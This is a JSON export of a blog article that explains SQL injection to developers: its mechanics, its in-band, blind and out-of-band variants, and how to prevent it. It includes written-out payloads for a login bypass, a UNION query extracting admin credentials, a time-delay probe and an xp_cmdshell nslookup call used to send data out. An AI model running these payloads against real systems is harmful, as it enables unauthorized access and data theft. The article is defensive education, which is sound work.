{"id":82168,"date":"2024-11-28T14:36:10","date_gmt":"2024-11-28T07:36:10","guid":{"rendered":"https:\/\/itviec.com\/blog\/?p=82168"},"modified":"2024-11-28T14:36:10","modified_gmt":"2024-11-28T07:36:10","slug":"sql-injection-la-gi","status":"publish","type":"post","link":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/","title":{"rendered":"SQL Injection: How it works and how to prevent SQLi"},"content":{"rendered":"<p><em><strong>SQL Injection is one of the most serious security vulnerabilities, causing major damage to web systems around the world. Hackers can exploit it to gain unauthorized access to data or even take control of the entire database.<\/strong><\/em><\/p>\n
<p>Read this article to better understand:<\/p>\n
<ul>\n
<li>What SQL injection is<\/li>\n
<li>The types of SQL injection<\/li>\n
<li>How SQL injection works<\/li>\n
<li>Risks, consequences and prevention<\/li>\n
<\/ul>\n
<h2><span class=\"ez-toc-section\" id=\"SQL_Injection_la_gi\"><\/span><b>What is SQL Injection?<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n
<p>SQL Injection (SQLi) is a security attack that occurs when user input is not validated and handled before being placed into an SQL statement for execution.<\/p>\n
<p>An attacker can then inject malicious SQL statements through that input to manipulate the database behind the application. Such statements can be used to take full control of the database server and to bypass security mechanisms such as the application's authentication and authorization, allowing the attacker to read, modify or delete sensitive data, or even change the structure of the database.<\/p>\n
<p>SQL Injection vulnerabilities can exist in any website or web application that uses an SQL database such as MySQL, Oracle, SQL Server or other database management systems. The consequences of these attacks can be severe, including theft of customer information, personal data, business secrets and intellectual property.<\/p>\n
<p>SQL Injection is one of the oldest, most common and most dangerous vulnerabilities affecting web applications. According to OWASP (Open Web Application Security Project), injection flaws, SQL Injection included, are ranked among the top threats in the <a href=\"https:\/\/www.acunetix.com\/vulnerability-scanner\/owasp-top-10-compliance\/\" target=\"_blank\" rel=\"noopener\">OWASP Top 10<\/a>. This underlines how important it is to understand and prevent this class of attack in order to protect data and systems.<\/p>\n
<h2><span class=\"ez-toc-section\" id=\"Cach_thuc_hoat_dong_cua_SQL_injection\"><\/span><b>How SQL injection works<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n
<p>SQL Injection works by exploiting weaknesses in how a web application handles its input. When a user enters data into a field on the site, that data is placed into an SQL statement that queries the database. If the application does not properly validate and sanitize the input, an attacker can inject malicious SQL commands that perform unintended actions on the database.<\/p>\n
<blockquote><p>Imagine a courtroom where a man named Bob is waiting for his trial. When filling in the form before the hearing, Bob writes his name as “Bob is free to leave”. When his turn comes, the judge reads aloud: “Calling Bob is free to leave”. Hearing this, the police officer lets Bob walk out of the courtroom, taking it as the judge's order.<\/p>\n
<p>SQL Injection works in much the same way.<\/p><\/blockquote>\n
<p>A field in an SQL query that was designed to accept a specific kind of data, such as a number, instead receives something unexpected, such as an SQL command. When that command is executed, it escapes its intended scope and can perform dangerous actions. These query fields are typically populated with data from forms on the website.<\/p>\n
<h2><span class=\"ez-toc-section\" id=\"Co_che_tan_cong_SQL_Injection\"><\/span><b>SQL Injection attack mechanism<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n
<h3><b>Injecting malicious SQL through user input<\/b><\/h3>\n
<p>Attackers make use of input fields such as login or search boxes. When the data is submitted, the malicious SQL can alter the original query, leading to unintended data access or manipulation.<\/p>\n
<h3><b>Changing the structure of the SQL statement<\/b><\/h3>\n
<p>The attacker uses special characters such as <code>'<\/code> or <code>--<\/code>, or logical conditions such as <code>OR 1=1<\/code>, to probe whether the application handles data safely. If a flaw is found, they exploit it to execute SQL commands the developer never intended.<\/p>\n
<p>Suppose the system builds the following SQL statement from the user's login input:<\/p>\n
<pre>SELECT * FROM users WHERE username = 'ten_nguoi_dung' AND password = 'mat_khau';<\/pre>\n
<p>Here <code>ten_nguoi_dung<\/code> is the input. If the attacker takes advantage of this and enters <code>' OR '1'='1<\/code>, the SQL statement becomes:<\/p>\n
<pre>SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '';<\/pre>\n
<p>As a result, the attacker can log in without needing a valid username or password: the injected text is parsed as part of the <code>WHERE<\/code> clause instead of being treated as data.<\/p>\n
<h3><b>SQL Injection can appear in many different parts of a query<\/b><\/h3>\n
<p>Most SQL Injection occurs in the <code>WHERE<\/code> clause of a <code>SELECT<\/code> query, and experienced testers are usually familiar with this form. However, SQL Injection can occur at any position in a query and in different kinds of statements.<\/p>\n
<p>Other common places where SQL Injection can appear include:<\/p>\n
<ul>\n
<li>In an <code>UPDATE<\/code> statement, in the values being updated or in the <code>WHERE<\/code> clause.<\/li>\n
<li>In an <code>INSERT<\/code> statement, in the values being inserted.<\/li>\n
<li>In a <code>SELECT<\/code> statement, in the table or column name.<\/li>\n
<li>In a <a href=\"https:\/\/itviec.com\/blog\/select-trong-sql\/\" target=\"_blank\" rel=\"noopener\">SELECT statement<\/a>, in the <code>ORDER BY<\/code> clause.<\/li>\n
<\/ul>\n
<h2><span class=\"ez-toc-section\" id=\"Cac_loai_SQL_Injection_pho_bien\"><\/span><b>Common types of SQL Injection<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n
<p>SQL Injection (SQLi) is usually divided into three main types, based on how data is extracted and how much damage is done:<\/p>\n
<h3><b>SQL Injection type 1: In-band SQLi (Classic)<\/b><\/h3>\n
<p>This is the most common and easiest type of SQL Injection to carry out. The attacker uses the same communication channel both to launch the attack and to collect the results. In-band SQLi has two main variants:<\/p>\n
<h4><b>Error-based SQLi<\/b><\/h4>\n
<p>The attacker deliberately performs actions that make the database raise errors. The information in those error messages can reveal the structure or contents of the database. For example, a syntax error message may disclose table or column names.<\/p>\n
<h4><b>Union-based SQLi<\/b><\/h4>\n
<p>This technique abuses the <code>UNION<\/code> operator to combine several <code>SELECT<\/code> queries, producing a single HTTP response that contains database data the attacker can use. It requires the attacker to know something about the structure of the tables in the targeted database.<\/p>\n
<h3><b>SQL Injection type 2: Inferential SQLi (Blind SQL injection)<\/b><\/h3>\n
<p>This type does not return data directly; instead the attacker infers it by observing the server's responses and behaviour. Because no data is received directly, it is called “blind”. Inferential SQLi usually takes longer but can still do serious damage, and is split into two main kinds:<\/p>\n
<h4><b>Boolean-based SQLi<\/b><\/h4>\n
<p>The attacker sends SQL queries containing true\/false conditions and observes the application's response to determine the outcome of the query.<\/p>\n
<h4><b>Time-based SQLi<\/b><\/h4>\n
<p>The attacker sends a query that forces the database to pause for a period of time. From the response time, the attacker can determine whether the query's condition was true or false without retrieving any data directly.<\/p>\n
<h3><b>SQL Injection type 3: Out-of-band SQLi<\/b><\/h3>\n
<p>This type is only feasible when the database server supports features such as DNS or HTTP requests that can be used to send data out. Out-of-band SQLi is typically used when the main channel is too slow or unstable for In-band or Inferential SQLi.<\/p>\n
<p>It lets the attacker collect data over secondary channels, for example through DNS or HTTP requests.<\/p>\n
<h2><span class=\"ez-toc-section\" id=\"Vi_du_ve_tung_loai_SQL_injection\"><\/span><b>Examples of each type of SQL injection<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n
<p>The following example is written in Java; an ordinary SQL query is used to fetch a student's record by ID:<\/p>\n
<pre>String studentId = request.getParameter(\"studentId\");\n\/\/ user input is concatenated straight into the query text: vulnerable to SQL Injection\nString query = \"SELECT * FROM students WHERE studentId = \" + studentId;<\/pre>\n
<p>If the user enters <code>117<\/code> in the form, the query becomes:<\/p>\n
<pre>SELECT * FROM students WHERE studentId = 117;<\/pre>\n
<p><b>Expected result<\/b>: the record of the student with <code>studentId = 117<\/code> is returned.<\/p>\n
<p>The examples for each type of SQL Injection below build on this example.<\/p>\n
<h3><b>In-band SQLi (Classic)<\/b><\/h3>\n
<p>As described above, In-band SQLi has two variants: <strong>Error-based SQLi<\/strong> and <strong>Union-based SQLi<\/strong>.<\/p>\n
<h4><b>Example of an attacked SQL query (Error-based SQLi)<\/b><\/h4>\n
<p>The attacker enters into the form:<\/p>\n
<pre>117'<\/pre>\n
<p>When processed, the query becomes:<\/p>\n
<pre>SELECT * FROM students WHERE studentId = 117';<\/pre>\n
<p><strong>Result:<\/strong> because the quote <code>'<\/code> is never closed, the database returns an error. The attacker can use the information in that error message to further exploit the database.<\/p>\n
<h4><b>Example of an attacked SQL query (Union-based SQLi)<\/b><\/h4>\n
<p>The attacker enters:<\/p>\n
<pre>117 UNION SELECT username, password FROM admin_users; --<\/pre>\n
<p>When processed, the query becomes:<\/p>\n
<pre>SELECT * FROM students WHERE studentId = 117 UNION SELECT username, password FROM admin_users; --;<\/pre>\n
<p>Where:<\/p>\n
<ul>\n
<li>The <code>UNION<\/code> combines results from the <code>students<\/code> table and the <code>admin_users<\/code> table.<\/li>\n
<li>The <code>--<\/code> is appended to comment out whatever follows, avoiding syntax errors or unwanted logic.<\/li>\n
<\/ul>\n
<p><strong>Result:<\/strong> sensitive information from the <code>admin_users<\/code> table is returned along with the student data (a <code>UNION<\/code> only succeeds when both <code>SELECT<\/code>s return the same number of columns with compatible types, which is why this variant needs some knowledge of the schema).<\/p>\n
<h3><b>Inferential SQLi (Blind)<\/b><\/h3>\n
<p>Inferential SQLi has two variants: <strong>Boolean-based SQLi<\/strong> and <strong>Time-based SQLi<\/strong>.<\/p>\n
<h4><b>Boolean-based SQLi<\/b><\/h4>\n
<p>The attacker can turn the query into a Boolean condition like this:<\/p>\n
<pre>SELECT * FROM students WHERE studentId = 117 OR 1=1;<\/pre>\n
<p><strong>Result:<\/strong> because the condition <code>1=1<\/code> is always true, the application returns student data (every row, since the condition matches all of them).<\/p>\n
<h4><b>Time-based SQLi<\/b><\/h4>\n
<p>The attacker can change the query into one that makes the system wait for some time before responding, for example with the following input:<\/p>\n
<pre>117; IF (1=1) WAITFOR DELAY '00:00:10'; --<\/pre>\n
<p>When processed, the query becomes:<\/p>\n
<pre>SELECT * FROM students WHERE studentId = 117; IF (1=1) WAITFOR DELAY '00:00:10'; --<\/pre>\n
<p>Where:<\/p>\n
<ul>\n
<li>Because the condition <code>1=1<\/code> is true, the system executes <code>WAITFOR DELAY '00:00:10'<\/code>, making the application wait 10 seconds before responding.<\/li>\n
<li>The attacker can change the condition to <code>1=0<\/code> to confirm the difference in response time.<\/li>\n
<\/ul>\n
<p><b>Result<\/b>: from the delay in the response, the attacker can infer that the query was manipulated and that the injected SQL condition executed successfully. (<code>WAITFOR DELAY<\/code> is Microsoft SQL Server syntax, and this example also relies on the server executing stacked statements separated by <code>;<\/code>.)<\/p>\n
<h3><b>Out-of-band SQLi<\/b><\/h3>\n
<p>The attacker can inject code that sends data to a server they control instead of reading a direct response from the database, for example:<\/p>\n
<pre>SELECT * FROM students WHERE studentId = 117; EXEC xp_cmdshell 'nslookup example.com'; --;<\/pre>\n
<p><strong>Result:<\/strong> this query runs the <code>nslookup<\/code> command on the database server, which performs a DNS lookup for <code>example.com<\/code> and thereby sends the result to the attacker's server. The attacker receives the result without any direct response from the database. (<code>xp_cmdshell<\/code> is a SQL Server extended stored procedure that is disabled by default; keeping it disabled and restricting the database server's outbound DNS and HTTP traffic closes this channel.)<\/p>\n
<h2><span class=\"ez-toc-section\" id=\"Nguy_co_va_hau_qua_cua_SQL_Injection\"><\/span><b>Risks and consequences of SQL Injection<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n
<h3><b>Main risks of SQL Injection<\/b><\/h3>\n
<ul>\n
<li><b>Identity spoofing<\/b>: the attacker can craft queries to access the system with another user's privileges, or even as an administrator.<\/li>\n
<li><b>Data manipulation<\/b>: SQL Injection lets the attacker modify, delete or insert data in the database, causing serious harm to the system and its users.<\/li>\n
<li><b>Tampering with transactions<\/b>: SQLi attacks can void transactions or change account balances, leading to serious problems of integrity and trust in the system.<\/li>\n
<li><b>Data leakage<\/b>: SQLi can let the attacker steal the entire contents of the database, from user information to sensitive data.<\/li>\n
<li><b>Deleting or disrupting data<\/b>: the attacker can delete or alter critical data, leaving the system unable to operate normally.<\/li>\n
<li><b>Taking over database administration<\/b>: if successful, the attacker can become the database administrator and gain full control of the system.<\/li>\n
<\/ul>\n
<h3><b>Consequences of SQL Injection<\/b><\/h3>\n
<ul>\n
<li><b>Financial damage<\/b>: losses from SQL Injection can be large, including the cost of remediation, data recovery and lost reputation.<\/li>\n
<li><b>Loss of user trust<\/b>: when personal information or sensitive data leaks, customers and users lose confidence in the system.<\/li>\n
<li><b>System damage<\/b>: a compromised system with altered data can see its applications disrupted or lose critical data entirely.<\/li>\n
<li><b>Loss of competitive advantage<\/b>: the attacker can steal business data and leak internal information, affecting the company's strategy and operations.<\/li>\n
<\/ul>\n
<h2><span class=\"ez-toc-section\" id=\"Cach_phong_chong_SQL_Injection\"><\/span><b>How to prevent SQL Injection<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n
<p>SQL Injection is a serious vulnerability that puts a web application's database at significant risk. Below are some common methods for protecting a system against these attacks:<\/p>\n
<ul>\n
<li><b>Use Prepared Statements (Parameterized Queries): <\/b>This is the most common way to prevent SQL Injection: it keeps input data strictly separate from the SQL statement. 
The SQL statement is defined first and then only receives specific parameter values. This guarantees that user data is never interpreted as SQL code. Modern ORM (Object-Relational Mapping) libraries usually do this automatically, which simplifies the process.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Trust no input<\/b><span style=\"font-weight: 400;\">: All input from users must be treated as untrusted. Whether it comes from an internal or a public user, any input used in an SQL query is a potential SQL Injection vector. Therefore, all input must be validated and handled carefully.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Escape input data: <\/b><span style=\"font-weight: 400;\">When receiving data from users, escape special characters such as <\/span><span style=\"font-weight: 400;\">&#39;<\/span><span style=\"font-weight: 400;\">, <\/span><span style=\"font-weight: 400;\">&quot;<\/span><span style=\"font-weight: 400;\">, <\/span><span style=\"font-weight: 400;\">;<\/span><span style=\"font-weight: 400;\">, or <\/span><span style=\"font-weight: 400;\">--<\/span><span style=\"font-weight: 400;\"> so that they cannot be processed as code. This ensures the database treats these characters as ordinary data rather than as SQL conditions or commands.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Use Stored Procedures: <\/b><span style=\"font-weight: 400;\">Although not a strong security strategy on its own, using <a href=\"https:\/\/itviec.com\/blog\/thu-tuc-trong-sql\/\" target=\"_blank\" rel=\"noopener\">stored procedures in SQL<\/a> can help reduce the risk of SQLi. Stored procedures execute SQL queries that are defined in advance inside the database. 
Combined with restricting the privileges of database accounts and type-checking the input, they prevent data of the wrong type from being entered and reduce the risk of SQL Injection.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Use a Web Application Firewall (WAF)<\/b><span style=\"font-weight: 400;\">: A WAF is an important part of a comprehensive security solution, helping to detect SQL Injection along with other threats. A WAF works from a continuously updated list of signatures, which lets it identify and accurately filter out malicious SQL queries.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Follow the &#8220;Least Privilege&#8221; principle<\/b><span style=\"font-weight: 400;\">: Restrict database access so that each account has only the privileges it needs to run its SQL queries. This limits the damage if an attacker gains access to the system.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Training and awareness<\/b><span style=\"font-weight: 400;\">: Everyone involved in building the application (developers, testers, DevOps, SysAdmins) needs training on security risks, including SQL Injection. Proper awareness of the problem reduces the chance of security vulnerabilities appearing in the product.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Use vulnerability scanning tools<\/b><span style=\"font-weight: 400;\">: SQLi can arise from developer mistakes or through third-party libraries and modules. Regularly scanning the web application with a tool such as Acunetix is therefore essential. 
Integrating automated scans into CI\/CD (Continuous Integration\/Continuous Deployment) pipelines is another way to maintain security continuously.<\/span><\/li>\n<\/ul>\n<blockquote><p><b><i>Note that combining several security measures at once strengthens safety and protects the system more effectively.<\/i><\/b><\/p><\/blockquote>\n<h2><span class=\"ez-toc-section\" id=\"Cau_hoi_thuong_gap_ve_SQL_Injection\"><\/span><b>Frequently asked questions about SQL Injection<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h3><b>How can you detect whether an application is vulnerable to SQL Injection?<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">To detect SQL Injection vulnerabilities in an application, you can:<\/span><\/p>\n<p><b>Test manually from the user interface:<\/b><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Enter special characters such as a single quote (<\/span><span style=\"font-weight: 400;\">&#39;<\/span><span style=\"font-weight: 400;\">) or SQL keywords such as <\/span><span style=\"font-weight: 400;\">OR 1=1<\/span><span style=\"font-weight: 400;\"> into input fields to check whether unusual errors appear.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Use Boolean conditions such as <\/span><span style=\"font-weight: 400;\">OR 1=1<\/span><span style=\"font-weight: 400;\"> and <\/span><span style=\"font-weight: 400;\">OR 1=2<\/span><span style=\"font-weight: 400;\"> to observe changes in the application's response.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Run time-based tests, for example with a payload such as <\/span><span style=\"font-weight: 400;\">WAITFOR DELAY '00:00:05'<\/span><span style=\"font-weight: 400;\"> to check whether the application responds more slowly.<\/span><\/li>\n<\/ul>\n<p><b>Check the server logs:<\/b><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Review the log records on the server to spot unusual SQL queries or queries that show signs of being altered by unsafe input.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Search for error messages or queries containing keywords characteristic of SQL Injection.<\/span><\/li>\n<\/ul>\n<p><b>Use automated testing tools:<\/b><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Use dedicated tools such as SQLMap, Burp Suite, or OWASP ZAP to automatically detect and test for SQL Injection vulnerabilities.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">These tools send large numbers of test payloads and analyse the application's responses to identify potential vulnerabilities.<\/span><\/li>\n<\/ul>\n<h3><b>Are prepared statements safe from SQL injection?<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">Yes, prepared statements are safe from SQL injection because they separate the SQL code from the user's input, ensuring that user data is only ever handled as a value and never as executable code, which blocks SQL injection attacks.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Similarly, safe stored procedures also provide protection by using parameterised input. 
Both approaches are effective, and which one you choose depends on your organisation's needs and applications.<\/span><\/p>\n<h3><b>How does Blind SQL Injection differ from Classic SQL Injection?<\/b><\/h3>\n<table>\n<tbody>\n<tr>\n<td><b>Criterion<\/b><\/td>\n<td><b>Blind SQL Injection<\/b><\/td>\n<td><b>Classic SQL Injection<\/b><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-weight: 400;\">Visibility of query results<\/span><\/td>\n<td style=\"text-align: left;\"><span style=\"font-weight: 400;\">Results cannot be viewed directly; information is inferred only from the application's indirect responses.<\/span><\/td>\n<td style=\"text-align: left;\"><span style=\"font-weight: 400;\">Data returned from the database can be viewed directly.<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-weight: 400;\">Main attack method<\/span><\/td>\n<td>\n<p style=\"text-align: left;\"><span style=\"font-weight: 400;\">&#8211; Boolean condition tests (True\/False).<\/span><\/p>\n<p style=\"text-align: left;\"><span style=\"font-weight: 400;\">&#8211; Time-delay attacks (Time-based SQLi).<\/span><\/p>\n<\/td>\n<td style=\"text-align: left;\"><span style=\"font-weight: 400;\">Runs the query directly and receives the data immediately.<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-weight: 400;\">Complexity<\/span><\/td>\n<td style=\"text-align: left;\"><span style=\"font-weight: 400;\">More complex; requires many trials and analysis of the application's responses.<\/span><\/td>\n<td style=\"text-align: left;\"><span style=\"font-weight: 400;\">Simpler, because the direct query returns clear results.<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-weight: 400;\">Attack goal<\/span><\/td>\n<td style=\"text-align: left;\"><span style=\"font-weight: 400;\">Gather information from the database without exposing explicit results.<\/span><\/td>\n<td style=\"text-align: left;\"><span style=\"font-weight: 400;\">Gain access to data or direct control of the database.<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2><span class=\"ez-toc-section\" id=\"Tong_ket\"><\/span><b>Summary<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><span style=\"font-weight: 400;\">Security is a journey, not a destination. SQL Injection is a serious threat to every web application that uses a database, and a reminder that any system needs continuous protection. With the right tools and prevention techniques, however, you can operate your system with confidence and without worrying about this risk.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">ITviec hopes this article has given you a clearer overview of SQL injection and some useful prevention methods.<\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>SQL Injection l\u00e0 m\u1ed9t trong nh\u1eefng l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt nghi\u00eam tr\u1ecdng nh\u1ea5t, g\u00e2y thi\u1ec7t h\u1ea1i l\u1edbn cho c\u00e1c h\u1ec7 th\u1ed1ng web tr\u00ean to\u00e0n th\u1ebf gi\u1edbi. Hacker c\u00f3 th\u1ec3 khai th\u00e1c l\u1ed7 h\u1ed5ng n\u00e0y \u0111\u1ec3 truy c\u1eadp tr\u00e1i ph\u00e9p v\u00e0o d\u1eef li\u1ec7u ho\u1eb7c th\u1eadm ch\u00ed ki\u1ec3m so\u00e1t to\u00e0n b\u1ed9 c\u01a1 s\u1edf d\u1eef li\u1ec7u. 
\u0110\u1ecdc b\u00e0i [&hellip;]<\/p>\n","protected":false},"author":209,"featured_media":82229,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_gspb_post_css":"","footnotes":""},"categories":[109],"tags":[],"class_list":["post-82168","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-chuyen-mon-it"],"blocksy_meta":[],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v26.8 (Yoast SEO v27.8) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>SQL Injection: C\u00e1ch th\u1ee9c ho\u1ea1t \u0111\u1ed9ng v\u00e0 ph\u00f2ng ch\u1ed1ng SQLi - ITviec Blog<\/title>\n<meta name=\"description\" content=\"SQL Injection l\u00e0 m\u1ed9t trong nh\u1eefng l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt ph\u1ed5 bi\u1ebfn nh\u1ea5t. Kh\u00e1m ph\u00e1 c\u00e1ch ph\u00e1t hi\u1ec7n, ph\u00e2n lo\u1ea1i v\u00e0 b\u1ea3o v\u1ec7 h\u1ec7 th\u1ed1ng kh\u1ecfi SQL Injection.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/\" \/>\n<meta property=\"og:locale\" content=\"vi_VN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"SQL Injection: C\u00e1ch th\u1ee9c ho\u1ea1t \u0111\u1ed9ng v\u00e0 ph\u00f2ng ch\u1ed1ng SQLi\" \/>\n<meta property=\"og:description\" content=\"SQL Injection l\u00e0 m\u1ed9t trong nh\u1eefng l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt nghi\u00eam tr\u1ecdng nh\u1ea5t, g\u00e2y thi\u1ec7t h\u1ea1i l\u1edbn cho c\u00e1c h\u1ec7 th\u1ed1ng web tr\u00ean to\u00e0n th\u1ebf gi\u1edbi. 
Hacker c\u00f3 th\u1ec3 khai th\u00e1c l\u1ed7\" \/>\n<meta property=\"og:url\" content=\"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/\" \/>\n<meta property=\"og:site_name\" content=\"ITviec Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/ITviec\" \/>\n<meta property=\"article:published_time\" content=\"2024-11-28T07:36:10+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/11\/SQL-Injection-vippro.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1500\" \/>\n\t<meta property=\"og:image:height\" content=\"790\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"M\u1ef9 Duy\u00ean\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@ITviec\" \/>\n<meta name=\"twitter:site\" content=\"@ITviec\" \/>\n<meta name=\"twitter:label1\" content=\"\u0110\u01b0\u1ee3c vi\u1ebft b\u1edfi\" \/>\n\t<meta name=\"twitter:data1\" content=\"M\u1ef9 Duy\u00ean\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u01af\u1edbc t\u00ednh th\u1eddi gian \u0111\u1ecdc\" \/>\n\t<meta name=\"twitter:data2\" content=\"19 ph\u00fat\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"SQL Injection: C\u00e1ch th\u1ee9c ho\u1ea1t \u0111\u1ed9ng v\u00e0 ph\u00f2ng ch\u1ed1ng SQLi - ITviec Blog","description":"SQL Injection l\u00e0 m\u1ed9t trong nh\u1eefng l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt ph\u1ed5 bi\u1ebfn nh\u1ea5t. 
Kh\u00e1m ph\u00e1 c\u00e1ch ph\u00e1t hi\u1ec7n, ph\u00e2n lo\u1ea1i v\u00e0 b\u1ea3o v\u1ec7 h\u1ec7 th\u1ed1ng kh\u1ecfi SQL Injection.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/","og_locale":"vi_VN","og_type":"article","og_title":"SQL Injection: C\u00e1ch th\u1ee9c ho\u1ea1t \u0111\u1ed9ng v\u00e0 ph\u00f2ng ch\u1ed1ng SQLi","og_description":"SQL Injection l\u00e0 m\u1ed9t trong nh\u1eefng l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt nghi\u00eam tr\u1ecdng nh\u1ea5t, g\u00e2y thi\u1ec7t h\u1ea1i l\u1edbn cho c\u00e1c h\u1ec7 th\u1ed1ng web tr\u00ean to\u00e0n th\u1ebf gi\u1edbi. Hacker c\u00f3 th\u1ec3 khai th\u00e1c l\u1ed7","og_url":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/","og_site_name":"ITviec Blog","article_publisher":"https:\/\/www.facebook.com\/ITviec","article_published_time":"2024-11-28T07:36:10+00:00","og_image":[{"width":1500,"height":790,"url":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/11\/SQL-Injection-vippro.jpg","type":"image\/jpeg"}],"author":"M\u1ef9 Duy\u00ean","twitter_card":"summary_large_image","twitter_creator":"@ITviec","twitter_site":"@ITviec","twitter_misc":{"\u0110\u01b0\u1ee3c vi\u1ebft b\u1edfi":"M\u1ef9 Duy\u00ean","\u01af\u1edbc t\u00ednh th\u1eddi gian \u0111\u1ecdc":"19 ph\u00fat"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/#article","isPartOf":{"@id":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/"},"author":{"name":"M\u1ef9 Duy\u00ean","@id":"https:\/\/itviec.com\/blog\/#\/schema\/person\/73733c0725c7e39e696a896bd1abe2d7"},"headline":"SQL Injection: C\u00e1ch th\u1ee9c ho\u1ea1t \u0111\u1ed9ng v\u00e0 ph\u00f2ng ch\u1ed1ng 
SQLi","datePublished":"2024-11-28T07:36:10+00:00","mainEntityOfPage":{"@id":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/"},"wordCount":5416,"publisher":{"@id":"https:\/\/itviec.com\/blog\/#organization"},"image":{"@id":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/#primaryimage"},"thumbnailUrl":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/11\/SQL-Injection-vippro.jpg","articleSection":["Chuy\u00ean m\u00f4n IT"],"inLanguage":"vi"},{"@type":"WebPage","@id":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/","url":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/","name":"SQL Injection: C\u00e1ch th\u1ee9c ho\u1ea1t \u0111\u1ed9ng v\u00e0 ph\u00f2ng ch\u1ed1ng SQLi - ITviec Blog","isPartOf":{"@id":"https:\/\/itviec.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/#primaryimage"},"image":{"@id":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/#primaryimage"},"thumbnailUrl":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/11\/SQL-Injection-vippro.jpg","datePublished":"2024-11-28T07:36:10+00:00","description":"SQL Injection l\u00e0 m\u1ed9t trong nh\u1eefng l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt ph\u1ed5 bi\u1ebfn nh\u1ea5t. 
